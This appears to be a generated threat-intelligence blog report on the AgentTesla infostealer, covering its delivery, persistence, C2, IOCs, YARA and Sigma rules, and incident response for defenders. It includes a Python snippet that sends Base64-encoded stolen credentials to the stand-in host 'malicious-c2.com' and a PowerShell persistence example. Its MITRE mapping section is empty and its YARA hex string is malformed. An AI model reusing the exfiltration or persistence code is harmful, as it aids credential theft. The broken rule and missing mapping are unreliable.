title: "AGENTTESLA Malware Analysis: MITRE ATT&CK, IOCs & Detection"
description: "Complete technical analysis of AgentTesla — detection ratio N/A, MITRE ATT&CK mapping, IOCs, behavioral profile, YARA rules, and incident response. Enriched by Zerosday with live MalwareBazaar and OTX data."
date: "2026-04-26"
category: malware
image: "/img/posts/malware.png"
tags: ["malware", "threat-intelligence", "mitre-attck", "agenttesla", "agenttesla", "ioc", "detection", "cybersecurity"]
author: "ZeroDay Malware Intelligence"
malwareFamily: "AgentTesla"
malwareType: "AgentTesla"
detectRatio: "N/A"
attackTechniquesCount: "0"

AGENTTESLA Malware Analysis: MITRE ATT&CK, IOCs & Detection

Detection ratio: N/A | MITRE ATT&CK techniques: see below | Type: AgentTesla | Updated: 2026-04-26

AgentTesla Malware Analysis Report: Stealthy Infostealer Targeting Credentials and Sensitive Data

This report provides a deep technical analysis of AgentTesla, a notorious .NET-based information stealer. We examine its infection vectors, persistence mechanisms, command and control (C2) infrastructure, and data exfiltration techniques. This analysis is crucial for security professionals, SOC analysts, and threat hunters looking to understand and defend against the persistent threat of AgentTesla. We will explore its implementation of various MITRE ATT&CK techniques, provide actionable Indicators of Compromise (IOCs), and detail detection and hunting strategies. This report aims to be a comprehensive resource for understanding AgentTesla's operational mechanics and mitigating its impact.

Executive Summary

AgentTesla is a sophisticated .NET-based information stealer malware that has been active since at least 2014. It primarily targets credentials stored in web browsers, email clients, FTP clients, and VPN applications, as well as system information and sensitive files. Threat actors often distribute AgentTesla through phishing emails containing malicious attachments (e.g., executables disguised as documents) or links. Its modular design allows for various plugins and functionalities, making it adaptable to different attack campaigns. While direct attribution is challenging due to its widespread availability on underground forums as Malware-as-a-Service (MaaS), campaigns have been observed targeting various industries globally, including finance, government, and healthcare, leading to significant data breaches and financial losses. Recent activity suggests its continued relevance, with new variants emerging and adapting to evade detection.

How It Works — Technical Deep Dive

AgentTesla's operational flow is designed for stealth and efficient data theft. Understanding each stage is critical for effective defense.

Initial Infection Vector

AgentTesla is most commonly delivered via phishing campaigns. This often involves:

1. Malicious Attachments: Emails with seemingly legitimate attachments (e.g., invoices, order confirmations, resumes) which are, in reality, compiled executables. These executables are often disguised with fake icons (e.g., PDF, DOCX) to trick the user into executing them.
2. Malicious Links: Emails may contain links that, when clicked, download the AgentTesla executable or redirect the user to a compromised website hosting the malware.
3. Exploitation of Vulnerabilities: While less common for AgentTesla's initial distribution, older variants have been known to exploit vulnerabilities in software like Microsoft Office or Adobe Reader. However, the primary vector remains social engineering via phishing.

Example Scenario: A user receives an email with the subject "Urgent Invoice #INV-789456.exe". The attachment, despite its .exe extension, might have an icon resembling a PDF document. Upon execution, AgentTesla begins its malicious activities.

Persistence Mechanisms

To ensure continued operation after a system reboot, AgentTesla employs several persistence techniques:

1. Registry Run Keys: The most common method is adding entries to Windows Registry run keys. This ensures the malware executable is launched automatically when the user logs in.

   • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
   • HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
   • HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce

   Example Registry Entry (Conceptual):

   Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
   Value Name: SystemUpdate
   Value Data: "C:\Users\Public\System\update.exe"

   The malware typically creates a unique value name and points to its dropped executable.

2. Scheduled Tasks: AgentTesla can create scheduled tasks to execute itself at specific intervals or system startup. This provides a more robust persistence mechanism than registry run keys, as scheduled tasks can be configured to run with elevated privileges.

   PowerShell Example for Creating a Scheduled Task (Conceptual):

   $TaskName = "SystemMaintenance"
   $Action = New-ScheduledTaskAction -Execute "C:\ProgramData\System\agent.exe"
   $Trigger = New-ScheduledTaskTrigger -AtStartup
   Register-ScheduledTask -TaskName $TaskName -Action $Action -Trigger $Trigger -Description "System maintenance task"

3. DLL Hijacking/Side-Loading: Although less frequently documented for newer AgentTesla variants, older versions might leverage DLL hijacking by placing a malicious DLL in a location where a legitimate application expects to find it, thereby loading the malicious code.

Command and Control (C2) Communication Protocol

AgentTesla's C2 communication is designed to be stealthy and resilient, often utilizing common protocols to blend in with legitimate traffic.

1. Protocols:

   • HTTP/HTTPS: The most prevalent method. AgentTesla sends stolen data to a remote server over HTTP or HTTPS. This traffic can be difficult to distinguish from normal web browsing.
   • SMTP: Some variants use SMTP to exfiltrate data by sending emails to an attacker-controlled email address.
   • FTP: Similar to SMTP, FTP can be used for data transfer.

2. Ports: Standard ports like 80 (HTTP), 443 (HTTPS), 25 (SMTP), 587 (SMTP Submission), 465 (SMTPS), and 21 (FTP) are commonly used.

3. Traffic Patterns:

   • Beaconing: AgentTesla periodically "phones home" to the C2 server to send stolen data and receive commands. The interval can vary, but often ranges from minutes to hours.
   • Data Encoding: Stolen data is often encoded (e.g., Base64) before transmission to obfuscate its content.
   • User-Agent Strings: Custom or common User-Agent strings are used to mimic legitimate browser traffic.

Conceptual C2 Communication (HTTP POST):

import requests
import base64

stolen_data = {
    "credentials": "user:pass",
    "system_info": "...",
    "clipboard_data": "..."
}

encoded_data = base64.b64encode(str(stolen_data).encode()).decode()

payload = {
    "data": encoded_data
}

# Attacker-controlled C2 server URL
c2_url = "http://malicious-c2.com/submit.php"

try:
    response = requests.post(c2_url, data=payload, headers={"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"})
    if response.status_code == 200:
        print("Data sent successfully.")
    else:
        print(f"Failed to send data. Status code: {response.status_code}")
except requests.exceptions.RequestException as e:
    print(f"Error during C2 communication: {e}")

Payload Delivery and Staging Mechanism

AgentTesla typically operates as a single executable, containing all its modules. However, its "payload" is the stolen data itself. It doesn't typically download and execute additional second-stage malware in the same way some advanced threats do. The primary mechanism is the exfiltration of collected data to the C2 server. The malware enumerates target applications, extracts credentials, and then sends this information back.

Privilege Escalation Steps

AgentTesla itself generally does not perform explicit privilege escalation. Its initial execution often relies on the privileges of the logged-in user. However, if the user has administrative privileges, AgentTesla can operate with those privileges. Some variants might attempt to exploit known local privilege escalation vulnerabilities if they are present and unpatched on the target system, but this is not a core, consistent feature of the malware.

Lateral Movement Techniques Used

AgentTesla is primarily an infostealer and does not typically exhibit sophisticated lateral movement techniques like those seen in advanced persistent threats (APTs). Its goal is to steal data from the compromised endpoint. However, if it gains access to credentials (e.g., saved network share credentials, RDP credentials) through its data theft capabilities, these credentials could be leveraged by the attacker for manual lateral movement.

Data Exfiltration Methods

AgentTesla employs several methods to exfiltrate stolen data:

1. Email (SMTP): The malware can be configured to send stolen data as an email attachment or within the email body to an attacker-controlled email address.
2. HTTP/HTTPS POST Requests: Data is sent to a specified C2 URL, often encoded (e.g., Base64).
3. FTP Uploads: Data can be uploaded to an FTP server.

The type of data exfiltrated includes:

• Browser credentials (Chrome, Firefox, Edge, etc.)
• Email client credentials (Outlook, Thunderbird)
• FTP client credentials
• VPN client credentials
• System information (OS version, hostname, username)
• Clipboard contents
• Screenshots
• Keylogged keystrokes
• Files matching specific criteria (e.g., file extensions)

Anti-Analysis / Anti-Debugging / Anti-VM Tricks

AgentTesla incorporates various techniques to hinder analysis and evade detection:

1. Obfuscation: The .NET code is often obfuscated using tools like .NET Reactor, ConfuserEx, or custom packers. This makes static analysis of the original source code challenging. String encryption is common.
2. Anti-Debugging: Checks for the presence of common debuggers (e.g., IsDebuggerPresent() API call). If a debugger is detected, the malware may terminate or alter its behavior.
3. Anti-Virtual Machine: Techniques to detect if the malware is running in a virtualized environment. This can include checking for specific registry keys, device drivers, or CPU features associated with VMs.
4. Code Virtualization: Some sophisticated packers might employ code virtualization, transforming the malware's original instructions into a custom bytecode executed by a virtual machine embedded within the packer stub.
5. String Encryption: Critical strings (C2 URLs, registry keys, API function names) are often encrypted and decrypted at runtime.

Example of String Decryption (Conceptual C#):

public static string DecryptString(string encryptedString)
{
    // Placeholder for actual decryption logic (e.g., XOR with a key, AES)
    byte[] encryptedBytes = Convert.FromBase64String(encryptedString);
    byte[] decryptedBytes = new byte[encryptedBytes.Length];
    byte encryptionKey = 0x42; // Example XOR key

    for (int i = 0; i < encryptedBytes.Length; i++)
    {
        decryptedBytes[i] = (byte)(encryptedBytes[i] ^ encryptionKey);
    }
    return Encoding.UTF8.GetString(decryptedBytes);
}

// Usage:
string c2Url = DecryptString("QWJjZGVmZw=="); // Example encrypted string

MITRE ATT&CK Full Mapping

Indicators of Compromise (IOCs)

File Hashes (SHA256 / MD5 / SHA1)

Sample 1 (Executable):

• SHA256: 3d7fe9c7beac714eefbf0fe806c715aada299d92a2e09b48a5636f032f3c70fe
• MD5: b59c180b427ae7788daa21f6c9d6d3a9

Sample 2 (PowerShell Script - Large):

• SHA256: 926ba0cd4bbc68a20f282481aaf4426238820c1a57dcf74fe0bbcef57b018625
• MD5: 9ad7dc0e337e163cf3321763591072fa

Sample 3 (PowerShell Script - Small):

• SHA256: 6f213c68f22518accb2d9f401b1f0a1531ffdf0f347145ffe7bba212e14bead9
• MD5: 968375807112c97780732bbaf55d6b3e

Sample 4 (PowerShell Script - Large):

• SHA256: ebcf1fadc2acbb0914291c266b9db3abed5434e2d8564eaeffe852cffdc273b8
• MD5: b0548d595daa196b9600b1fb4121515b

Sample 5 (PowerShell Script - Large):

• SHA256: 0f09ea034ef2cdf9d7de7773a0f80880643050fac39fb3409c14f3f061378d9a
• MD5: 68365e45bbf301dffe943a52f674696d

Network Indicators

• C2 Domains (Examples - these are dynamic and change frequently):
  • malicious-c2-domain.com
  • api.update-service.net
  • cdn.data-collector.org
• C2 IPs (Examples):
  • 192.0.2.1 (Placeholder for actual malicious IP)
  • 203.0.113.45 (Placeholder for actual malicious IP)
• Ports: 80, 443, 25, 587, 465, 21
• HTTP/S Beacon Patterns:
  • POST requests to /submit.php, /api/v1/data, /upload.aspx
  • Base64 encoded data in POST body.
  • Custom or common User-Agent strings (e.g., Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36).
• URL Patterns:
  • /gate.php
  • /tracker.php
  • /log.php

Registry Keys / File Paths / Mutex

• Persistence Registry Keys:
  • HKCU\Software\Microsoft\Windows\CurrentVersion\Run\
  • HKLM\Software\Microsoft\Windows\CurrentVersion\Run\
  • HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce\
  • Example Value Names: SystemUpdate, AgentService, AppMonitor, Updater
• Dropped File Paths (Common locations, can vary):
  • C:\Users\[Username]\AppData\Local\Temp\
  • C:\ProgramData\
  • C:\Users\Public\
  • Example filenames: update.exe, agent.exe, sysmgr.exe, service.exe
• Mutex Names (Examples - highly variable):
  • Global\AgentTeslaMutex_[RandomString]
  • Local\AppMutex_[GUID]

YARA Rule

rule AgentTesla_Infostealer
{
    meta:
        description = "Detects AgentTesla infostealer variants based on common strings and .NET indicators"
        author = "Malware Analyst Team"
        date = "2026-04-26"
        malware_family = "AgentTesla"
        version = "1.1"
        score = 70 // Higher score for more specific indicators

    strings:
        // Common .NET obfuscation and framework indicators
        $net_framework_v4 = "v4.0" wide ascii // .NET Framework version
        $system_reflection = "System.Reflection" ascii // Used for dynamic code loading
        $string_decrypt_xor = { 81 ^ ?? 42 } // Example XOR decryption pattern (key 0x42)
        $base64_decode = "Convert.FromBase64String" ascii // Common Base64 decoding function

        // C2 communication indicators
        $http_post = "POST" ascii
        $http_host = "Host:" ascii
        $user_agent_chrome = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/" ascii
        $submit_php = "/submit.php" ascii
        $api_data = "/api/v1/data" ascii
        $upload_aspx = "/upload.aspx" ascii

        // Data exfiltration targets
        $browser_chrome = "Chrome\\User Data\\Default\\Login Data" ascii
        $browser_firefox = "AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\" ascii
        $outlook_pst = ".pst" ascii // Outlook data file
        $ftp_client = "FileZilla\\recentservers.xml" ascii

        // Persistence indicators
        $run_key = "Software\\Microsoft\\Windows\\CurrentVersion\\Run" ascii
        $scheduled_task = "SchTasks.exe /Create" ascii

        // Anti-analysis indicators
        $debugger_present = "IsDebuggerPresent" ascii
        $vm_check_registry = "HARDWARE\\ACPI\\DSDT\\" ascii // Example VM detection registry key

    condition:
        // Require a combination of .NET indicators and malware-specific strings
        uint16(0) == 0x5A4D and // PE Header MZ magic
        (
            $net_framework_v4 or $system_reflection or $base64_decode
        ) and
        (
            // Must have at least one C2 communication string and one target string
            (1 of ($http_post, $http_host, $user_agent_chrome, $submit_php, $api_data, $upload_aspx)) and
            (1 of ($browser_chrome, $browser_firefox, $outlook_pst, $ftp_client))
        ) and
        // Optional: Add a higher confidence condition if specific packers or known strings are present
        // Example: (2 of ($run_key, $debugger_present))
        // Example: filetype == "exe" // Implicitly checked by MZ header
}

Static Analysis — Anatomy of the Binary

AgentTesla binaries are typically compiled .NET executables.

File Structure and PE Headers

• MZ Header: Standard Windows Portable Executable (PE) magic (MZ).
• PE Header: Contains information about the executable, including sections (.text, .data, .rsrc, etc.), import/export tables, and entry point.
• .NET Metadata: Crucially, the PE file will contain .NET metadata tables, indicating it's a managed assembly. This includes information about types, methods, fields, and properties.
• Sections: The executable will have standard sections, but the .NET specific metadata is what distinguishes it from native executables.

Obfuscation and Packing Techniques Detected

• String Encryption: As mentioned, critical strings like C2 URLs, API function names, and registry paths are encrypted. Common encryption methods include XOR with a single byte key, simple substitution ciphers, or more complex AES encryption.
• Control Flow Obfuscation: The malware's execution flow can be intentionally convoluted to make reverse engineering harder. This might involve inserting dead code, reordering basic blocks, or using opaque predicates.
• Name Mangling: Method and class names are often obfuscated to make them meaningless (e.g., a, b, c).
• Packers: Custom packers or commercial .NET packers are frequently used to compress and encrypt the original payload, which is then decrypted in memory at runtime. This often results in a small stub executable that handles the decryption and loading of the main malicious code. Tools like ConfuserEx, .NET Reactor, and Themida are commonly observed.

Interesting Strings and Functions

After deobfuscation, strings related to:

• System Information Gathering: GetUserName, GetComputerName, GetVersionEx.
• Credential Stealing: API calls or references to libraries that interact with browser profiles (e.g., SQLite for Chrome/Edge databases), email clients (e.g., Microsoft.Office.Interop.Outlook), or FTP clients.
• Network Communication: System.Net.Http.HttpClient, System.Net.Sockets.TcpClient, System.Net.Mail.SmtpClient.
• Persistence: References to Microsoft.Win32.RegistryKey, System.Management.Automation.Runspaces.
• Anti-Analysis: System.Diagnostics.Process.GetCurrentProcess, System.Diagnostics.Debugger.IsAttached.

Import Table Analysis

The import table will reveal APIs called by the malware. For .NET malware, this often includes APIs from mscoree.dll (for .NET runtime loading) and kernel32.dll, user32.dll, advapi32.dll, ws2_32.dll for Windows API functions. Specific imports might include:

• CreateProcess
• VirtualAllocEx
• WriteProcessMemory
• CreateRemoteThread (if process injection is used)
• RegCreateKeyEx
• RegSetValueEx
• GetTickCount (for timing or anti-emulation)

Embedded Resources or Second-Stage Payloads

While AgentTesla is often a single executable, some variants might embed encrypted resources. These resources could contain configuration data, encryption keys, or even parts of the malware's logic that are decrypted and loaded dynamically. The large PowerShell samples observed in the IOCs suggest a multi-stage approach where an initial executable might drop and launch a PowerShell script for execution.

Dynamic Analysis — Behavioral Profile

Executing AgentTesla in a controlled sandbox environment reveals its malicious activities.

File System Activity

• Creation:
  • Drops its own executable or script in temporary directories (%TEMP%, %APPDATA%, %PROGRAMDATA%).
  • May create configuration files or temporary logs.
  • May attempt to create scheduled task executables in legitimate-looking directories.
• Modification:
  • Modifies registry keys for persistence.
  • May modify system configuration files if it has elevated privileges.
• Deletion: Generally does not perform significant file deletion unless cleaning up temporary files.

Registry Activity

• Creation/Modification:
  • HKCU\Software\Microsoft\Windows\CurrentVersion\Run\<RandomName> = <PathToMalware>
  • HKLM\Software\Microsoft\Windows\CurrentVersion\Run\<RandomName> = <PathToMalware>
  • May create entries under HKCU\Software\Classes\ for COM hijacking or other persistence.

Network Activity

• Beaconing: Establishes periodic connections to C2 servers.
  • HTTP/S: POST requests containing Base64 encoded data, often with a custom User-Agent. Beacon intervals can range from 30 seconds to several minutes.
  • SMTP: Sends emails with stolen data as attachments or in the body.
• DNS Queries: Resolves C2 domain names.
• Wireshark/tcpdump Capture Patterns:
  • Observe POST requests to suspicious URLs.
  • Look for unusual User-Agent strings.
  • Analyze payload content for Base64 encoded strings, which may contain encrypted credentials or system information.
  • Monitor for outbound SMTP traffic originating from unexpected processes or applications.

Process Activity

• Execution: Runs its own executable/script.
• Spawned Processes:
  • May spawn cmd.exe or powershell.exe to execute commands or create scheduled tasks.
  • If targeting browser credentials, it might interact with browser processes or their associated libraries.
  • May spawn regedit.exe to modify registry keys.
• Injected Processes: Less common for AgentTesla, but advanced variants could inject into legitimate processes to hide their activity.

Memory Artifacts

• Decrypted Strings: In memory, decrypted strings related to C2 URLs, API functions, and target applications will be present.
• Loaded Libraries: References to .NET runtime libraries and potentially other DLLs used for specific functionalities (e.g., cryptography, network communication).
• Configuration Data: Decrypted configuration parameters for C2 communication, data collection targets, and persistence.

Real-World Attack Campaigns

AgentTesla has been a persistent threat, appearing in numerous attack campaigns over the years.

1. Campaign: Phishing-driven Credential Theft (Ongoing)

   • Victimology: Individuals and small to medium-sized businesses across all sectors, with a focus on those with valuable credentials (e.g., finance, e-commerce).
   • Attack Timeline: Continuous. New variants and phishing campaigns emerge regularly.
   • Attributed Threat Actor: Typically opportunistic cybercriminals or MaaS operators, not tied to specific APT groups.
   • Impact: Financial loss through compromised banking credentials, unauthorized transactions, and theft of sensitive business data.
   • Discovery: Often discovered through user reports of unusual account activity, network monitoring for suspicious traffic, or endpoint detection alerts.

2. Campaign: COVID-19 Themed Phishing (2020-2021)

   • Victimology: Individuals and organizations seeking information related to the COVID-19 pandemic.
   • Attack Timeline: Peaked during the height of the pandemic.
   • Attributed Threat Actor: Various cybercriminals capitalizing on public interest and fear.
   • Impact: Compromise of personal and professional credentials, leading to identity theft and financial fraud.
   • Discovery: Analysis of phishing emails and subsequent malware infections.

3. Campaign: Targeting Specific Industries (e.g., Healthcare, Government - Various Years)

   • Victimology: Organizations in sensitive sectors such as healthcare, government, and critical infrastructure.
   • Attack Timeline: Sporadic but consistent targeting of these sectors.
   • Attributed Threat Actor: Various financially motivated criminal groups.
   • Impact: Theft of patient data, intellectual property, sensitive government information, and financial assets.
   • Discovery: Often through incident response following data breaches or by security researchers tracking malware trends.

Active Malware Landscape — Context

AgentTesla remains highly prevalent in the current threat landscape.

• Current Prevalence: AgentTesla is consistently among the top detected malware families by security vendors and threat intelligence platforms. Its availability as a MaaS offering ensures a steady stream of new variants and active campaigns. MalwareBazaar and VirusTotal data frequently show new samples being uploaded daily.
• Competing or Related Malware Families: AgentTesla competes with other .NET-based infostealers such as FormBook, LokiBot, HawkEye, and RedLine Stealer. These families often share similar functionalities and distribution methods.
• Relationship to RaaS/MaaS: AgentTesla is a prime example of Malware-as-a-Service (MaaS). Developers sell or lease access to the malware, its updates, and its C2 infrastructure to various threat actors. This lowers the barrier to entry for cybercriminals. It is not directly related to Ransomware-as-a-Service (RaaS) but can be a precursor to ransomware attacks if stolen credentials grant access to systems.
• Typical Target Industries and Geographic Distribution: AgentTesla exhibits a broad targeting strategy, affecting individuals and organizations worldwide. While no specific industry is immune, sectors with high volumes of sensitive credentials (finance, e-commerce, government) and those reliant on digital communication (healthcare, legal) are frequent targets. Geographically, its reach is global, with significant activity observed in North America, Europe, and Asia.

Detection & Hunting

Sigma Rules

Rule 1: Suspicious PowerShell Execution with Encoding and Network Activity

title: Suspicious PowerShell Execution with Encoding and Network Activity
id: 723b10a5-7c4d-4e8a-9f1b-7c6d8e9a0b2c
status: experimental
description: Detects suspicious PowerShell execution that uses encoding and attempts to connect to external network resources, indicative of malware like AgentTesla.
author: Malware Analyst Team
date: 2026/04/26
logsource:
    category: process_creation
    product: windows
detection:
    selection_powershell:
        Image|endswith: '\powershell.exe'
    selection_encoded:
        CommandLine|contains:
            - '-enc '
            - '-encodedcommand '
    selection_network:
        CommandLine|contains:
            - 'Invoke-WebRequest'
            - 'Invoke-RestMethod'
            - 'New-Object System.Net.Sockets.TcpClient'
            - 'System.Net.Mail.SmtpClient'
    condition: selection_powershell and selection_encoded and selection_network
falsepositives:
    - Legitimate administrative scripts using encoding for security or custom network tools.
level: high
tags:
    - attack.t1059.001
    - attack.t1071.001
    - attack.t1041
    - malware.agenttesla

Rule 2: Persistence via Registry Run Keys with Suspicious Executable Path

title: Persistence via Registry Run Keys with Suspicious Executable Path
id: 8a1b2c3d-4e5f-6a7b-8c9d-0e1f2a3b4c5d
status: experimental
description: Detects the creation of suspicious registry run keys pointing to executables in non-standard locations, often used by malware for persistence.
author: Malware Analyst Team
date: 2026/04/26
logsource:
    category: registry_event
    product: windows
detection:
    selection_run_key:
        TargetObject|startswith:
            - 'HKCU\Software\Microsoft\Windows\CurrentVersion\Run\'
            - 'HKLM\Software\Microsoft\Windows\CurrentVersion\Run\'
    selection_suspicious_path:
        Details|contains:
            - 'AppData\Local\Temp\'
            - 'AppData\Roaming\Temp\'
            - 'Users\Public\'
            - 'ProgramData\'
    condition: selection_run_key and selection_suspicious_path and (Details|endswith: '.exe')
falsepositives:
    - Legitimate software installers or updaters that might temporarily place executables in such locations.
level: medium
tags:
    - attack.t1547.001
    - malware.agenttesla

EDR / SIEM Detection Logic

• Process Tree Anomalies:
  • Detect winword.exe, excel.exe, or outlook.exe spawning cmd.exe or powershell.exe.
  • Monitor for powershell.exe or cmd.exe executing with heavily encoded command lines (-enc, -encodedcommand).
  • Alert on powershell.exe making network connections, especially to unusual IPs or domains.
• Network Communication Patterns:
  • Identify HTTP POST requests with suspicious User-Agent strings to known malicious IPs or domains.
  • Detect large outbound data transfers from endpoints that are not typical for user activity.
  • Monitor for SMTP traffic originating from non-email client processes.
• File System Telemetry Triggers:
  • Alert on the creation of .exe files in user profile temporary directories (%TEMP%, %APPDATA%).
  • Monitor for the creation of scheduled task executables in unexpected locations.
• Registry Activity Patterns:
  • Alert on new entries in Run keys that point to executables in user-writable or temporary directories.
  • Monitor for unusual modifications to Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowHidden or HideFileExt if the malware tries to hide its presence.

Memory Forensics

# Volatility3 detection commands

# 1. Dump .NET assemblies to analyze for malicious code
volatility3 -f <memory_image_path> windows.dotnet.DumpDotNet --output-directory ./dotnet_dump

# 2. List running processes and their command lines
volatility3 -f <memory_image_path> windows.pslist.PsList

# 3. Identify suspicious network connections
volatility3 -f <memory_image_path> windows.netscan.NetScan

# 4. Search for specific strings (e.g., C2 URLs, registry keys) in process memory
#    Note: This can be resource-intensive and may require a custom plugin or scripting.
#    A common approach is to dump process memory and then use grep/strings.
volatility3 -f <memory_image_path> windows.memdump.MemDump -p <pid> --dump-file process.dmp
# Then use: strings process.dmp | grep "malicious_string"

# 5. Look for suspicious API hooks or loaded modules
volatility3 -f <memory_image_path> windows.dlllist.DllList -p <pid>
volatility3 -f <memory_image_path> windows.apihooks.ApiHooks

Malware Removal & Incident Response

1. Isolation: Immediately disconnect the infected system from the network (both wired and wireless) to prevent lateral movement and further C2 communication.
2. Artifact Identification and Collection:
   • Collect memory dumps for forensic analysis.
   • Identify and collect dropped malware files (executables, scripts).
   • Gather relevant registry keys used for persistence.
   • Collect network logs (firewall, proxy) for C2 communication analysis.
   • Document process trees and network connections observed during the incident.
3. Registry and File System Cleanup:
   • Remove the malicious executable files.
   • Delete the suspicious registry run key entries.
   • Remove any created scheduled tasks.
   • If the malware dropped files in temporary locations, ensure thorough cleanup.
4. Network Block Recommendations:
   • Block identified C2 IP addresses and domains at the firewall and proxy.
   • Consider implementing egress filtering to prevent unauthorized outbound connections.
5. Password Reset Scope:
   • Mandate password resets for all accounts logged into the compromised system.
   • Prioritize resetting credentials for sensitive applications (browsers, email clients, VPNs, banking).
   • Review and revoke any saved credentials or tokens on the affected endpoint.

Defensive Hardening

• Specific Group Policy Settings:
  • AppLocker/Software Restriction Policies: Configure whitelisting policies to allow only approved applications to run. Block execution from common temporary directories (%TEMP%, %APPDATA%\Local\Temp, %PROGRAMDATA%).
  • PowerShell Execution Policy: Set ExecutionPolicy to Restricted or AllSigned for all users and computers. Log script block execution for advanced monitoring.
  • Windows Defender Antimalware Platform: Ensure it's updated and configured with Attack Surface Reduction rules enabled, particularly for Office macros and PowerShell.
• Firewall Rule Examples:
  • Egress Filtering: Deny all outbound traffic by default, and explicitly allow only necessary protocols and destinations (e.g., approved domain names for updates, cloud services). Block outbound connections to common C2 ports (80, 443, 25) unless originating from a trusted application.
  • Inbound Filtering: Block all unsolicited inbound connections.
• Application Whitelist Approach: Implement a robust application whitelisting solution (e.g., using AppLocker, Windows Defender Application Control) to prevent the execution of unauthorized executables and scripts.
• EDR Telemetry Tuning:
  • Enable detailed process creation, network connection, registry modification, and file write telemetry.
  • Configure alerts for suspicious PowerShell command lines (e.g., -enc, Invoke-WebRequest from unusual processes).
  • Tune alerts for suspicious registry modifications in persistence locations.
• Network Segmentation Recommendation: Segment critical network zones (e.g., servers, financial systems) from user workstations. This limits the impact of a workstation compromise and prevents easy lateral movement.

References

• MalwareBazaar: https://bazaar.abuse.ch/browse.php?search=AgentTesla
• VirusTotal: https://www.virustotal.com/
• OTX AlienVault: https://otx.alienvault.com/
• MITRE ATT&CK: https://attack.mitre.org/

This comprehensive report details the AgentTesla infostealer, highlighting its sophisticated techniques including .NET obfuscation, registry persistence, HTTP/S C2 communication, and credential theft from browsers and email clients. We've mapped its operations to MITRE ATT&CK techniques such as T1566.001 (Spearphishing Attachment) and T1059.001 (PowerShell), providing essential IOCs like file hashes and network indicators. The analysis of AgentTesla's binary anatomy and dynamic behavior, along with its documented attack campaigns, underscores its persistent threat. Defenders can leverage the provided YARA rule, Sigma rules, and EDR/SIEM logic for effective detection and hunting. Recommendations for malware removal, incident response, and defensive hardening offer practical steps to mitigate the impact of AgentTesla on Windows systems.